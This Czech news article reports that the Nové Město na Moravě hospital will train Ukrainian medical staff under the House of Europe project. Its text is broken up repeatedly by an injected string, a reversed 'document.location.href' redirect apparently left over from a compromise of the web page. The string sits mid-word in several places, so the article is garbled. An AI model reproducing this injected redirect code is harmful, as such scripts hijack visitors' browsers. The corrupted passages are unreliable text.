Rainbow page separator

Zdravotníci z nemocnice budou školit kolegy na Ukrajině

Neděle, 20. října 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Součástí čtyřletého projektu, který má pomoci zvýšit kvalitu zdravotnictví na Ukrajině, se stala novoměstská nemocnice. První odborný program proběhne na konci října v ukrajinském Ivano-Frankivsku. „Na dvoudenním semináři bude přednášet primář našeho dětského a novorozeneckého oddělení Martin Chalupský a lékaři z novorozeneckého oddělení Fakultní nemocnice Olomouc Anna Baštan a Vojtěch Bodnár,“ uvedla mluvčí novoměstské nemocnice Tamara Pecková.
„Na seminář připravuji tři témata. První je o vrozených srdečních vadách, další o arytmiích v novorozeneckém věku a poslední přednáškou bude péče o novorozence v naší porodnici od narození do propuštění,“ přiblížil náměty svých přednášek primář dětského oddělení Martin Chalupský. „Jsem zvědavý, na jaké úrovni je pediatrie a dětská kardiologie právě na Ukrajině, rád se potkám i s kolegy z Fakultní nemocnice Olomouc. Věřím, že [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude i pro mě velice cenná zkušenost,“ dodal primář.
Vznik projektu House of Europe byl iniciován Evropskou komisí na podporu rozvoje Ukrajiny a má za cíl rozvíjet oblasti kultury a kreativních průmyslů, vzdělávání, práci s mladými, práci s médii a úroveň zdravotnictví. „Naše nemocnice byla oslovena Českým centrem, zda bychom byli ochotní stát se partnery projektu House of Europe. Společně s naší nemocnicí své zkušenosti budou ukrajinským zdravotníkům a také lidem z vedení některých ukrajinských nemocnic předávat také kolegové z Fakultní nemocnice Olomouc. Velice si takové nabídky vážíme, bude [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přínos i pro nás, nejen pro ukrajinské zdravotníky,“ konsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovala ředitelka nemocnice v Novém Městě Věra Palečková.